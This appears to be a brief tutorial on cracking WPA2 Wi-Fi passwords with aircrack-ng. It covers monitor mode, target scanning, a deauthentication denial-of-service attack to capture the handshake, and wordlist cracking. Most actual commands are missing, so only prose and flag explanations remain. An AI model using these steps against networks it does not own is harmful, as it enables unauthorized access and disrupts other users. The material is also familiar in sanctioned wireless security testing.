Hack WPA2 Networks
Install Aircrak-ng In Your Machine
Put the Network Interface Card in Monitor Mode
Identify the Wireless Network Card
Run The Below Commands
Look For Targets
Scan A Specific Target
Capture the Handshake
Performing DoS on the AP
You can use aireplay-ng or mdk4 to disconnect devices from APs for a time. This is called a de-authentication attack or a wireless DOS (Denial-Of-Service) attack.
Now here’s the game plan:
Setup airodump-ng to capture packets and save them
De-authenticate the device for some time while airodump-ng is running
Capture the handshake
1. Setup airodump-ng to capture packets and save them
Here, we're using the -c flag to specify the channel to search, the --bssid flag for the MAC address of the AP, and the -w flag to give a path you want to save the captured packets to.
Quick lesson: Channels reduce the chances of APs interfering with each other. When running airodump-ng, you can identify the channel number under the CH column.
2. Run the De-Authentication Attack
The -a flag specifies the MAC address of the AP, --deauth specifies how long you want the attack to run in seconds, followed up by the network card.
3. Capture the Handshake
While the DOS attack is underway, check on your airodump scan. You should see at the right top : WPA handshake: <mac address>. Once you have verified that, you can stop the replay attack and the airodump-ng scan.
Cracking the Captured Password
A PMK is basically an algorithmic combination of a word and the APs name. Our intention is to continuously generate PMKs using a wordlist against the handshake. If the PMK is valid, the word used to generate it is the password. If the PMK is not valid, it skips to the next word on the list.
END: Put Your Network Card In Managed Mode
To clean up, simply remove the file captures, close your terminals, and run the command service NetworkManager restart to change your network card back to managed mode so you can connect to the Wi-Fi.
Last updated